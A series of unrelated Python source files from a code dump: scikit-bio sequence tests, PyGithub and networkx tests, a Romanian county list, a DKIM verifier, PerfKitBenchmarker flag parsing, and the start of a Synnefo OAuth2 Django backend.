def degenerate_map(cls):
return {"X": set("AB"), "Y": set("BC"), "Z": set("AC")}
@classproperty
def nondegenerate_chars(cls):
return set("ABC")
class ExampleMotifsTester(ExampleIUPACSequence):
@property
def _motifs(self):
# These aren't really motifs, just a way to excercise the code paths
return {
"name1": lambda x, _, __: str(x),
"name2": lambda x, _, __: len(x)
}
class TestIUPACSequence(TestCase):
def setUp(self):
self.lowercase_seq = ExampleIUPACSequence('AAAAaaaa', lowercase='key')
def test_instantiation_with_no_implementation(self):
class IUPACSequenceSubclassNoImplementation(IUPACSequence):
pass
with self.assertRaises(TypeError) as cm:
IUPACSequenceSubclassNoImplementation()
self.assertIn("abstract class", str(cm.exception))
self.assertIn("nondegenerate_chars", str(cm.exception))
self.assertIn("degenerate_map", str(cm.exception))
def test_init_default_parameters(self):
seq = ExampleIUPACSequence('.-ABCXYZ')
npt.assert_equal(seq.values, np.array('.-ABCXYZ', dtype='c'))
self.assertFalse(seq.has_metadata())
self.assertFalse(seq.has_positional_metadata())
def test_init_nondefault_parameters(self):
seq = ExampleIUPACSequence('.-ABCXYZ',
metadata={'id': 'foo'},
positional_metadata={'quality': range(8)})
npt.assert_equal(seq.values, np.array('.-ABCXYZ', dtype='c'))
self.assertTrue(seq.has_metadata())
self.assertEqual(seq.metadata['id'], 'foo')
self.assertTrue(seq.has_positional_metadata())
npt.assert_equal(seq.positional_metadata['quality'], np.array(range(8),
dtype='int'))
def test_init_valid_empty_sequence(self):
# just make sure we can instantiate an empty sequence regardless of
# `validate` and `lowercase` parameters. more extensive tests
# are performed in Sequence base class unit tests
for validate in (True, False):
for lowercase in (True, False):
seq = ExampleIUPACSequence('', validate=validate,
lowercase=lowercase)
self.assertEqual(seq, ExampleIUPACSequence(''))
def test_init_valid_single_character_sequence(self):
for validate in (True, False):
for lowercase in (True, False):
seq = ExampleIUPACSequence('C', validate=validate,
lowercase=lowercase)
self.assertEqual(seq, ExampleIUPACSequence('C'))
def test_init_valid_multiple_character_sequence(self):
for validate in (True, False):
for lowercase in (True, False):
seq = ExampleIUPACSequence('BAACB.XYY-AZ', validate=validate,
lowercase=lowercase)
self.assertEqual(seq, ExampleIUPACSequence('BAACB.XYY-AZ'))
def test_init_validate_parameter_single_character(self):
seq = 'w'
with six.assertRaisesRegex(self, ValueError, "character.*'w'"):
ExampleIUPACSequence(seq)
# test that we can instantiate an invalid sequence. we don't guarantee
# anything working beyond instantiation
ExampleIUPACSequence(seq, validate=False)
def test_init_validate_parameter_multiple_characters(self):
# mix of valid and invalid characters with repeats and lowercased
# alphabet characters
seq = 'CBCBBbawCbbwBXYZ-.x'
with six.assertRaisesRegex(self, ValueError, "\['a', 'b', 'w', 'x'\]"):
ExampleIUPACSequence(seq)
ExampleIUPACSequence(seq, validate=False)
def test_init_lowercase_all_lowercase(self):
s = 'cbcbbbazcbbzbxyz-.x'
with six.assertRaisesRegex(self, ValueError,
"\['a', 'b', 'c', 'x', 'y', 'z'\]"):
ExampleIUPACSequence(s)
seq = ExampleIUPACSequence(s, lowercase=True)
self.assertEqual(seq, ExampleIUPACSequence('CBCBBBAZCBBZBXYZ-.X'))
def test_init_lowercase_mixed_case(self):
s = 'CBCBBbazCbbzBXYZ-.x'
with six.assertRaisesRegex(self, ValueError, "\['a', 'b', 'x', 'z'\]"):
ExampleIUPACSequence(s)
seq = ExampleIUPACSequence(s, lowercase=True)
self.assertEqual(seq, ExampleIUPACSequence('CBCBBBAZCBBZBXYZ-.X'))
def test_init_lowercase_no_validation(self):
s = 'car'
with six.assertRaisesRegex(self, ValueError, "\['a', 'c', 'r'\]"):
ExampleIUPACSequence(s)
with six.assertRaisesRegex(self, ValueError, "character.*'R'"):
ExampleIUPACSequence(s, lowercase=True)
ExampleIUPACSequence(s, lowercase=True, validate=False)
def test_init_lowercase_byte_ownership(self):
bytes = np.array([97, 98, 97], dtype=np.uint8)
with six.assertRaisesRegex(self, ValueError, "\['a', 'b'\]"):
ExampleIUPACSequence(bytes)
seq = ExampleIUPACSequence(bytes, lowercase=True)
self.assertEqual(seq, ExampleIUPACSequence('ABA'))
# should not share the same memory
self.assertIsNot(seq._bytes, bytes)
# we should have copied `bytes` before modifying in place to convert to
# upper. make sure `bytes` hasn't been mutated
npt.assert_equal(bytes, np.array([97, 98, 97], dtype=np.uint8))
def test_init_lowercase_invalid_keys(self):
for invalid_key in ((), [], 2):
invalid_type = type(invalid_key)
with six.assertRaisesRegex(self, TypeError,
"lowercase keyword argument expected "
"a bool or string, but got %s" %
invalid_type):
ExampleIUPACSequence('ACGTacgt', lowercase=invalid_key)
def test_lowercase_mungeable_key(self):
# NOTE: This test relies on Sequence._munge_to_index_array working
# properly. If the internal implementation of the lowercase method
# changes to no longer use _munge_to_index_array, this test may need
# to be updated to cover cases currently covered by
# _munge_to_index_array
self.assertEqual('AAAAaaaa', self.lowercase_seq.lowercase('key'))
def test_lowercase_array_key(self):
# NOTE: This test relies on Sequence._munge_to_index_array working
# properly. If the internal implementation of the lowercase method
# changes to no longer use _munge_to_index_array, this test may need
# to be updated to cover cases currently covered by
# _munge_to_index_array
self.assertEqual('aaAAaaaa',
self.lowercase_seq.lowercase(
np.array([True, True, False, False, True, True,
True, True])))
self.assertEqual('AaAAaAAA',
self.lowercase_seq.lowercase([1, 4]))
def test_degenerate_chars(self):
expected = set("XYZ")
self.assertIs(type(ExampleIUPACSequence.degenerate_chars), set)
self.assertEqual(ExampleIUPACSequence.degenerate_chars, expected)
ExampleIUPACSequence.degenerate_chars.add("W")
self.assertEqual(ExampleIUPACSequence.degenerate_chars, expected)
self.assertEqual(ExampleIUPACSequence('').degenerate_chars, expected)
with self.assertRaises(AttributeError):
ExampleIUPACSequence('').degenerate_chars = set("BAR")
def test_nondegenerate_chars(self):
expected = set("ABC")
self.assertEqual(ExampleIUPACSequence.nondegenerate_chars, expected)
ExampleIUPACSequence.degenerate_chars.add("D")
self.assertEqual(ExampleIUPACSequence.nondegenerate_chars, expected)
self.assertEqual(ExampleIUPACSequence('').nondegenerate_chars,
expected)
with self.assertRaises(AttributeError):
ExampleIUPACSequence('').nondegenerate_chars = set("BAR")
def test_gap_chars(self):
expected = set(".-")
self.assertIs(type(ExampleIUPACSequence.gap_chars), set)
self.assertEqual(ExampleIUPACSequence.gap_chars, expected)
ExampleIUPACSequence.gap_chars.add("_")
self.assertEqual(ExampleIUPACSequence.gap_chars, expected)
self.assertEqual(ExampleIUPACSequence('').gap_chars, expected)
with self.assertRaises(AttributeError):
ExampleIUPACSequence('').gap_chars = set("_ =")
def test_alphabet(self):
expected = set("ABC.-XYZ")
self.assertIs(type(ExampleIUPACSequence.alphabet), set)
self.assertEqual(ExampleIUPACSequence.alphabet, expected)
ExampleIUPACSequence.alphabet.add("DEF")
self.assertEqual(ExampleIUPACSequence.alphabet, expected)
self.assertEqual(ExampleIUPACSequence('').alphabet, expected)
with self.assertRaises(AttributeError):
ExampleIUPACSequence('').alphabet = set("ABCDEFG.-WXYZ")
def test_degenerate_map(self):
expected = {"X": set("AB"), "Y": set("BC"), "Z": set("AC")}
self.assertEqual(ExampleIUPACSequence.degenerate_map, expected)
ExampleIUPACSequence.degenerate_map['W'] = set("ABC")
ExampleIUPACSequence.degenerate_map['X'] = set("CA")
self.assertEqual(ExampleIUPACSequence.degenerate_map, expected)
self.assertEqual(ExampleIUPACSequence('').degenerate_map, expected)
with self.assertRaises(AttributeError):
ExampleIUPACSequence('').degenerate_map = {'W': "ABC"}
def test_gaps(self):
self.assertIs(type(ExampleIUPACSequence("").gaps()), np.ndarray)
self.assertIs(ExampleIUPACSequence("").gaps().dtype, np.dtype('bool'))
npt.assert_equal(ExampleIUPACSequence("ABCXBZYABC").gaps(),
np.zeros(10).astype(bool))
npt.assert_equal(ExampleIUPACSequence(".-.-.").gaps(),
np.ones(5).astype(bool))
npt.assert_equal(ExampleIUPACSequence("A.B-C.X-Y.").gaps(),
np.array([0, 1] * 5, dtype=bool))
npt.assert_equal(ExampleIUPACSequence("AB.AC.XY-").gaps(),
np.array([0, 0, 1] * 3, dtype=bool))
npt.assert_equal(ExampleIUPACSequence("A.BC.-").gaps(),
np.array([0, 1, 0, 0, 1, 1], dtype=bool))
def test_has_gaps(self):
self.assertIs(type(ExampleIUPACSequence("").has_gaps()), bool)
self.assertIs(type(ExampleIUPACSequence("-").has_gaps()), bool)
self.assertFalse(ExampleIUPACSequence("").has_gaps())
self.assertFalse(ExampleIUPACSequence("ABCXYZ").has_gaps())
self.assertTrue(ExampleIUPACSequence("-").has_gaps())
self.assertTrue(ExampleIUPACSequence("ABCXYZ-").has_gaps())
def test_degenerates(self):
self.assertIs(type(ExampleIUPACSequence("").degenerates()), np.ndarray)
self.assertIs(ExampleIUPACSequence("").degenerates().dtype,
np.dtype('bool'))
npt.assert_equal(ExampleIUPACSequence("ABCBC-.AB.").degenerates(),
np.zeros(10).astype(bool))
npt.assert_equal(ExampleIUPACSequence("ZYZYZ").degenerates(),
np.ones(5).astype(bool))
npt.assert_equal(ExampleIUPACSequence("AX.Y-ZBXCZ").degenerates(),
np.array([0, 1] * 5, dtype=bool))
npt.assert_equal(ExampleIUPACSequence("ABXACY.-Z").degenerates(),
np.array([0, 0, 1] * 3, dtype=bool))
npt.assert_equal(ExampleIUPACSequence("AZBCXY").degenerates(),
np.array([0, 1, 0, 0, 1, 1], dtype=bool))
def test_has_degenerates(self):
self.assertIs(type(ExampleIUPACSequence("").has_degenerates()), bool)
self.assertIs(type(ExampleIUPACSequence("X").has_degenerates()), bool)
self.assertFalse(ExampleIUPACSequence("").has_degenerates())
self.assertFalse(ExampleIUPACSequence("A-.BC").has_degenerates())
self.assertTrue(ExampleIUPACSequence("Z").has_degenerates())
self.assertTrue(ExampleIUPACSequence("ABC.XYZ-").has_degenerates())
def test_nondegenerates(self):
self.assertIs(type(ExampleIUPACSequence("").nondegenerates()),
np.ndarray)
self.assertIs(ExampleIUPACSequence("").nondegenerates().dtype,
np.dtype('bool'))
npt.assert_equal(ExampleIUPACSequence("XYZYZ-.XY.").nondegenerates(),
np.zeros(10).astype(bool))
npt.assert_equal(ExampleIUPACSequence("ABABA").nondegenerates(),
np.ones(5).astype(bool))
npt.assert_equal(ExampleIUPACSequence("XA.B-AZCXA").nondegenerates(),
np.array([0, 1] * 5, dtype=bool))
npt.assert_equal(ExampleIUPACSequence("XXAZZB.-C").nondegenerates(),
np.array([0, 0, 1] * 3, dtype=bool))
npt.assert_equal(ExampleIUPACSequence("YB.-AC").nondegenerates(),
np.array([0, 1, 0, 0, 1, 1], dtype=bool))
def test_has_nondegenerates(self):
self.assertIs(type(ExampleIUPACSequence("").has_nondegenerates()),
bool)
self.assertIs(type(ExampleIUPACSequence("A").has_nondegenerates()),
bool)
self.assertFalse(ExampleIUPACSequence("").has_nondegenerates())
self.assertFalse(ExampleIUPACSequence("X-.YZ").has_nondegenerates())
self.assertTrue(ExampleIUPACSequence("C").has_nondegenerates())
self.assertTrue(ExampleIUPACSequence(".XYZ-ABC").has_nondegenerates())
def test_degap(self):
kw = {
'metadata': {
'id': 'some_id',
'description': 'some description',
},
}
self.assertEqual(
ExampleIUPACSequence("", positional_metadata={'qual': []},
**kw).degap(),
ExampleIUPACSequence("", positional_metadata={'qual': []},
**kw))
self.assertEqual(
ExampleIUPACSequence(
"ABCXYZ",
positional_metadata={'qual': np.arange(6)},
**kw).degap(),
ExampleIUPACSequence(
"ABCXYZ",
positional_metadata={'qual': np.arange(6)},
**kw))
self.assertEqual(
ExampleIUPACSequence(
"ABC-XYZ",
positional_metadata={'qual': np.arange(7)},
**kw).degap(),
ExampleIUPACSequence(
"ABCXYZ",
positional_metadata={'qual': [0, 1, 2, 4, 5, 6]},
**kw))
self.assertEqual(
ExampleIUPACSequence(
".-ABC-XYZ.",
positional_metadata={'qual': np.arange(10)},
**kw).degap(),
ExampleIUPACSequence(
"ABCXYZ",
positional_metadata={'qual': [2, 3, 4, 6, 7, 8]},
**kw))
self.assertEqual(
ExampleIUPACSequence(
"---.-.-.-.-.",
positional_metadata={'quality': np.arange(12)},
**kw).degap(),
ExampleIUPACSequence(
"",
positional_metadata={'quality': np.array([], dtype=np.int64)},
**kw))
def test_expand_degenerates_no_degens(self):
seq = ExampleIUPACSequence("ABCABCABC")
self.assertEqual(list(seq.expand_degenerates()), [seq])
def test_expand_degenerates_all_degens(self):
exp = [ExampleIUPACSequence('ABA'), ExampleIUPACSequence('ABC'),
ExampleIUPACSequence('ACA'), ExampleIUPACSequence('ACC'),
ExampleIUPACSequence('BBA'), ExampleIUPACSequence('BBC'),
ExampleIUPACSequence('BCA'), ExampleIUPACSequence('BCC')]
# Sort based on sequence string, as order is not guaranteed.
obs = sorted(ExampleIUPACSequence('XYZ').expand_degenerates(), key=str)
self.assertEqual(obs, exp)
def test_expand_degenerates_with_metadata(self):
kw = {
"metadata": {
"id": "some_id",
"description": "some description"
},
"positional_metadata": {
"quality": np.arange(3),
},
}
exp = [ExampleIUPACSequence('ABA', **kw),
ExampleIUPACSequence('ABC', **kw),
ExampleIUPACSequence('BBA', **kw),
ExampleIUPACSequence('BBC', **kw)]
obs = sorted(ExampleIUPACSequence('XBZ', **kw).expand_degenerates(),
key=str)
self.assertEqual(obs, exp)
def test_to_regex_no_degens(self):
seq = ExampleIUPACSequence('ABC')
regex = seq.to_regex()
self.assertEqual(regex.pattern, str(seq))
def test_to_regex_with_degens(self):
seq = ExampleIUPACSequence('AYZ')
regex = seq.to_regex()
self.assertFalse(any(regex.match(s) is None
for s in 'ABA ABC ACA ACC'.split()))
self.assertTrue(all(regex.match(s) is None
for s in 'CBA BBA ABB AAA'.split()))
def test_find_motifs_no_motif(self):
seq = ExampleMotifsTester("ABCABCABC")
with self.assertRaises(ValueError) as cm:
seq.find_motifs("doesn't-exist")
self.assertIn("doesn't-exist", str(cm.exception))
seq = ExampleIUPACSequence("ABCABCABC")
with self.assertRaises(ValueError) as cm:
seq.find_motifs("doesn't-exist")
self.assertIn("doesn't-exist", str(cm.exception))
def test_find_motifs(self):
seq = ExampleMotifsTester("ABC")
self.assertEqual(seq.find_motifs("name1"), "ABC")
self.assertEqual(seq.find_motifs("name2"), 3)
def test_repr(self):
# basic sanity checks for custom repr stats. more extensive testing is
# performed on Sequence.__repr__
# minimal
obs = repr(ExampleIUPACSequence(''))
self.assertEqual(obs.count('\n'), 7)
self.assertTrue(obs.startswith('ExampleIUPACSequence'))
self.assertIn('length: 0', obs)
self.assertIn('has gaps: False', obs)
self.assertIn('has degenerates: False', obs)
self.assertIn('has non-degenerates: False', obs)
self.assertTrue(obs.endswith('-'))
# no metadata, mix of gaps, degenerates, and non-degenerates
obs = repr(ExampleIUPACSequence('AY-B'))
self.assertEqual(obs.count('\n'), 8)
self.assertTrue(obs.startswith('ExampleIUPACSequence'))
self.assertIn('length: 4', obs)
self.assertIn('has gaps: True', obs)
self.assertIn('has degenerates: True', obs)
self.assertIn('has non-degenerates: True', obs)
self.assertTrue(obs.endswith('0 AY-B'))
# metadata and positional metadata of mixed types
obs = repr(
ExampleIUPACSequence(
'ABCA',
metadata={'foo': 42, u'bar': 33.33, None: True, False: {},
(1, 2): 3, 'acb' * 100: "'"},
positional_metadata={'foo': range(4),
42: ['a', 'b', [], 'c']}))
self.assertEqual(obs.count('\n'), 18)
self.assertTrue(obs.startswith('ExampleIUPACSequence'))
self.assertIn('None: True', obs)
self.assertIn('\'foo\': 42', obs)
self.assertIn('42: <dtype: object>', obs)
self.assertIn('\'foo\': <dtype: int64>', obs)
self.assertIn('length: 4', obs)
self.assertIn('has gaps: False', obs)
self.assertIn('has degenerates: False', obs)
self.assertIn('has non-degenerates: True', obs)
self.assertTrue(obs.endswith('0 ABCA'))
# sequence spanning > 5 lines
obs = repr(ExampleIUPACSequence('A' * 301))
self.assertEqual(obs.count('\n'), 12)
self.assertTrue(obs.startswith('ExampleIUPACSequence'))
self.assertIn('length: 301', obs)
self.assertIn('has gaps: False', obs)
self.assertIn('has degenerates: False', obs)
self.assertIn('has non-degenerates: True', obs)
self.assertIn('...', obs)
self.assertTrue(obs.endswith('300 A'))
if __name__ == "__main__":
main()
|
DavidWhittingham/agsadmin | refs/heads/develop | agsadmin/sharing_admin/portals/RolesResponse.py | 1 | from __future__ import (absolute_import, division, print_function, unicode_literals)
from builtins import (ascii, bytes, chr, dict, filter, hex, input, int, map, next, oct, open, pow, range, round, str,
super, zip)
class RolesResponse(object):
@property
def num(self):
return self._num
@property
def next_start(self):
return self._next_start
@property
def start(self):
return self._start
@property
def total(self):
return self._total
@property
def roles(self):
return self._roles
def __init__(self, start, num, total, next_start, roles):
super().__init__()
self._start = start
self._num = num
self._total = total
self._next_start = next_start
self._roles = roles
|
crwilcox/PyGithub | refs/heads/master | github/tests/GitRef.py | 39 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import Framework
class GitRef(Framework.TestCase):
def setUp(self):
Framework.TestCase.setUp(self)
self.ref = self.g.get_user().get_repo("PyGithub").get_git_ref("heads/BranchCreatedByPyGithub")
def testAttributes(self):
self.assertEqual(self.ref.object.sha, "1292bf0e22c796e91cc3d6e24b544aece8c21f2a")
self.assertEqual(self.ref.object.type, "commit")
self.assertEqual(self.ref.object.url, "https://api.github.com/repos/jacquev6/PyGithub/git/commits/1292bf0e22c796e91cc3d6e24b544aece8c21f2a")
self.assertEqual(self.ref.ref, "refs/heads/BranchCreatedByPyGithub")
self.assertEqual(self.ref.url, "https://api.github.com/repos/jacquev6/PyGithub/git/refs/heads/BranchCreatedByPyGithub")
def testEdit(self):
self.ref.edit("04cde900a0775b51f762735637bd30de392a2793")
def testEditWithForce(self):
self.ref.edit("4303c5b90e2216d927155e9609436ccb8984c495", force=True)
def testDelete(self):
self.ref.delete()
|
psawaya/Mental-Ginger | refs/heads/master | django/contrib/localflavor/ro/ro_counties.py | 428 | # -*- coding: utf-8 -*-
"""
A list of Romanian counties as `choices` in a formfield.
This exists as a standalone file so that it's only imported into memory when
explicitly needed.
"""
COUNTIES_CHOICES = (
('AB', u'Alba'),
('AR', u'Arad'),
('AG', u'Argeş'),
('BC', u'Bacău'),
('BH', u'Bihor'),
('BN', u'Bistriţa-Năsăud'),
('BT', u'Botoşani'),
('BV', u'Braşov'),
('BR', u'Brăila'),
('B', u'Bucureşti'),
('BZ', u'Buzău'),
('CS', u'Caraş-Severin'),
('CL', u'Călăraşi'),
('CJ', u'Cluj'),
('CT', u'Constanţa'),
('CV', u'Covasna'),
('DB', u'Dâmboviţa'),
('DJ', u'Dolj'),
('GL', u'Galaţi'),
('GR', u'Giurgiu'),
('GJ', u'Gorj'),
('HR', u'Harghita'),
('HD', u'Hunedoara'),
('IL', u'Ialomiţa'),
('IS', u'Iaşi'),
('IF', u'Ilfov'),
('MM', u'Maramureş'),
('MH', u'Mehedinţi'),
('MS', u'Mureş'),
('NT', u'Neamţ'),
('OT', u'Olt'),
('PH', u'Prahova'),
('SM', u'Satu Mare'),
('SJ', u'Sălaj'),
('SB', u'Sibiu'),
('SV', u'Suceava'),
('TR', u'Teleorman'),
('TM', u'Timiş'),
('TL', u'Tulcea'),
('VS', u'Vaslui'),
('VL', u'Vâlcea'),
('VN', u'Vrancea'),
)
|
vvv1559/intellij-community | refs/heads/master | python/testData/refactoring/inlinelocal/py994.before.py | 83 | class C:
def foo(self):
co<caret>nf = Conference()
return conf |
thepropterhoc/Cha_The_Pivot | refs/heads/master | app/node_modules/mailin/python/verifydkim.py | 9 | #!/usr/bin/env python
"""
Given a raw email message on stdin, verify its dkim signature. Exit with code 11
if the signature is not valid.
"""
import dkim
import os
import sys
def main():
msg = sys.stdin.read()
res = None
res = dkim.verify(msg)
print('[' + os.path.basename(__file__) + '] isDkimValid = ' + str(res))
if not res:
# Invalid signature, exit with code 11.
sys.exit(11)
if __name__ == '__main__':
main()
|
ReganBell/QReview | refs/heads/master | networkx/algorithms/tests/test_distance_regular.py | 87 | #!/usr/bin/env python
from nose.tools import *
import networkx as nx
class TestDistanceRegular:
def test_is_distance_regular(self):
assert_true(nx.is_distance_regular(nx.icosahedral_graph()))
assert_true(nx.is_distance_regular(nx.petersen_graph()))
assert_true(nx.is_distance_regular(nx.cubical_graph()))
assert_true(nx.is_distance_regular(nx.complete_bipartite_graph(3,3)))
assert_true(nx.is_distance_regular(nx.tetrahedral_graph()))
assert_true(nx.is_distance_regular(nx.dodecahedral_graph()))
assert_true(nx.is_distance_regular(nx.pappus_graph()))
assert_true(nx.is_distance_regular(nx.heawood_graph()))
assert_true(nx.is_distance_regular(nx.cycle_graph(3)))
# no distance regular
assert_false(nx.is_distance_regular(nx.path_graph(4)))
def test_not_connected(self):
G=nx.cycle_graph(4)
G.add_cycle([5,6,7])
assert_false(nx.is_distance_regular(G))
def test_global_parameters(self):
b,c=nx.intersection_array(nx.cycle_graph(5))
g=nx.global_parameters(b,c)
assert_equal(list(g),[(0, 0, 2), (1, 0, 1), (1, 1, 0)])
b,c=nx.intersection_array(nx.cycle_graph(3))
g=nx.global_parameters(b,c)
assert_equal(list(g),[(0, 0, 2), (1, 1, 0)])
def test_intersection_array(self):
b,c=nx.intersection_array(nx.cycle_graph(5))
assert_equal(b,[2, 1])
assert_equal(c,[1, 1])
b,c=nx.intersection_array(nx.dodecahedral_graph())
assert_equal(b,[3, 2, 1, 1, 1])
assert_equal(c,[1, 1, 1, 2, 3])
b,c=nx.intersection_array(nx.icosahedral_graph())
assert_equal(b,[5, 2, 1])
assert_equal(c,[1, 2, 5])
|
kivio/PerfKitBenchmarker | refs/heads/master | perfkitbenchmarker/flag_util.py | 4 | # Copyright 2015 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for working with user-supplied flags."""
import logging
import re
from perfkitbenchmarker import flags
INTEGER_GROUP_REGEXP = re.compile(r'(\d+)(-(\d+))?$')
class IntegerList(object):
"""An immutable list of nonnegative integers.
The list contains either single integers (ex: 5) or ranges (ex:
8-12). The list can include as many elements as will fit in
memory. Furthermore, the memory required to hold a range will not
grow with the size of the range.
Make a list with
lst = IntegerList(groups)
where groups is a list whose elements are either single integers or
2-tuples holding the low and high bounds of a range
(inclusive). (Ex: [5, (8,12)] represents the integer list
5,8,9,10,11,12.)
"""
def __init__(self, groups):
self.groups = groups
length = 0
for elt in groups:
if isinstance(elt, int) or isinstance(elt, long):
length += 1
if isinstance(elt, tuple):
length += elt[1] - elt[0] + 1
self.length = length
def __len__(self):
return self.length
def __getitem__(self, idx):
if not isinstance(idx, int):
raise TypeError()
if idx < 0 or idx >= self.length:
raise IndexError()
group_idx = 0
while idx > 0:
group = self.groups[group_idx]
if not isinstance(group, tuple):
group_idx += 1
idx -= 1
else:
group_len = group[1] - group[0] + 1
if idx >= group_len:
group_idx += 1
idx -= group_len
else:
return group[0] + idx
if isinstance(self.groups[group_idx], tuple):
return self.groups[group_idx][0]
else:
return self.groups[group_idx]
def __iter__(self):
for group in self.groups:
if isinstance(group, int) or isinstance(group, long):
yield group
else:
low, high = group
for val in xrange(low, high + 1):
yield val
class IntegerListParser(flags.ArgumentParser):
"""Parse a string containing a comma-separated list of nonnegative integers.
The list may contain single integers and dash-separated ranges. For
example, "1,3,5-7" parses to [1,3,5,6,7].
Can pass the flag on_nonincreasing to the constructor to tell it
what to do if the list is nonincreasing. Options are
- None: do nothing.
- IntegerListParser.WARN: log a warning.
- IntegerListParser.EXCEPTION: raise a ValueError.
As a special case, instead of a string, can pass a list of integers
or an IntegerList. In these cases, the return value iterates over
the same integers as were in the argument.
"""
syntactic_help = ('A comma-separated list of nonnegative integers or integer '
'ranges. Ex: 1,3,5-7 is read as 1,3,5,6,7.')
WARN = 'warn'
EXCEPTION = 'exception'
def __init__(self, on_nonincreasing=None):
super(IntegerListParser, self).__init__()
self.on_nonincreasing = on_nonincreasing
def Parse(self, inp):
"""Parse an integer list.
Args:
inp: a string, a list, or an IntegerList.
Returns:
An iterable of integers.
Raises:
ValueError if inp doesn't follow a format it recognizes.
"""
if isinstance(inp, IntegerList):
return inp
elif isinstance(inp, list):
return IntegerList(inp)
def HandleNonIncreasing():
if self.on_nonincreasing == IntegerListParser.WARN:
logging.warning('Integer list %s is not increasing', inp)
elif self.on_nonincreasing == IntegerListParser.EXCEPTION:
raise ValueError('Integer list %s is not increasing', inp)
groups = inp.split(',')
result = []
for group in groups:
match = INTEGER_GROUP_REGEXP.match(group)
if match is None:
raise ValueError('Invalid integer list %s', inp)
elif match.group(2) is None:
val = int(match.group(1))
if len(result) > 0 and val <= result[-1]:
HandleNonIncreasing()
result.append(val)
else:
low = int(match.group(1))
high = int(match.group(3))
if high <= low or (len(result) > 0 and low <= result[-1]):
HandleNonIncreasing()
result.append((low, high))
return IntegerList(result)
def Type(self):
return 'integer list'
class IntegerListSerializer(flags.ArgumentSerializer):
def Serialize(self, il):
return ','.join([str(val) if isinstance(val, int) or isinstance(val, long)
else '%s-%s' % (val[0], val[1])
for val in il.groups])
def DEFINE_integerlist(name, default, help, on_nonincreasing=None,
flag_values=flags.GLOBAL_FLAGS, **args):
"""Register a flag whose value must be an integer list."""
parser = IntegerListParser(on_nonincreasing=on_nonincreasing)
serializer = IntegerListSerializer()
flags.DEFINE(parser, name, default, help, flag_values, serializer, **args)
|
olgabrani/synnefo | refs/heads/feature-newui-pithos | snf-astakos-app/astakos/oa2/backends/djangobackend.py | 9 | # Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import astakos.oa2.models as oa2_models
from astakos.oa2.backends import base as oa2base
from astakos.oa2.backends import base as errors
from django import http
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import URLValidator
from django.core.urlresolvers import reverse
from django.conf.urls.defaults import patterns, url
from django.http import HttpResponseNotAllowed
from django.utils.encoding import smart_str, iri_to_uri
from django.views.decorators.csrf import csrf_exempt
from synnefo.lib import join_urls
from synnefo.util import urltools
import urllib
import logging
logger = logging.getLogger(__name__)
class DjangoViewsMixin(object):
def auth_view(self, request):
oa2request = self.build_request(request)
oa2response = self.authorize(oa2request, accept=False)
return self._build_response(oa2response)
@csrf_exempt
def token_view(self, request):
if request.method != 'POST':
return HttpResponseNotAllowed(['POST'])
oa2request = self.build_request(request)
oa2response = self.grant_token(oa2request)
return self._build_response(oa2response)
class DjangoBackendORMMixin(object):
def get_client_by_credentials(self, username, password):
try:
return oa2_models.Client.objects.get(identifier=username,
secret=password)
except oa2_models.Client.DoesNotExist:
raise errors.InvalidClientID("No such client found")
def get_client_by_id(self, clientid):
try:
return oa2_models.Client.objects.get(identifier=clientid)
except oa2_models.Client.DoesNotExist:
raise errors.InvalidClientID("No such client found")
def get_authorization_code(self, code):
try:
return oa2_models.AuthorizationCode.objects.get(code=code)
except oa2_models.AuthorizationCode.DoesNotExist:
raise errors.OA2Error("No such authorization code")
def get_token(self, token):
try:
return oa2_models.Token.objects.get(code=token)
except oa2_models.Token.DoesNotExist:
raise errors.OA2Error("No such token")
def delete_authorization_code(self, code):
code.delete()
logger.info(u'%r deleted' % code)
def delete_token(self, token):
token.delete()
logger.info(u'%r deleted' % token)
def check_credentials(self, client, username, secret):
if not (username == client.get_id() and secret == client.secret):
raise errors.InvalidAuthorizationRequest("Invalid credentials")
class DjangoBackend(DjangoBackendORMMixin, oa2base.SimpleBackend,
DjangoViewsMixin):
code_model = oa2_models.AuthorizationCode.objects
token_model = oa2_models.Token.objects
client_model = oa2_models.Client.objects
def _build_response(self, oa2response):
response = http.HttpResponse()
response.status_code = oa2response.status
response.content = oa2response.body
for key, value in oa2response.headers.iteritems():
response[smart_str(key)] = smart_str(value)
return response
def build_request(self, django_request):
params = {
'method': django_request.method,
'path': django_request.path,
'GET': django_request.GET,
'POST': django_request.POST,
'META': django_request.META,
'secure': settings.DEBUG or django_request.is_secure(),
#'secure': django_request.is_secure(),
}
# TODO: check for valid astakos user
if django_request.user.is_authenticated():
params['user'] = django_request.user
return oa2base.Request(**params)
def get_url_patterns(self):
_patterns = patterns(
'',
url(r'^%s/?$' % join_urls(self.endpoints_prefix,
self.authorization_endpoint.rstrip('/')),
self.auth_view,
name='%s_authenticate' % self.id),
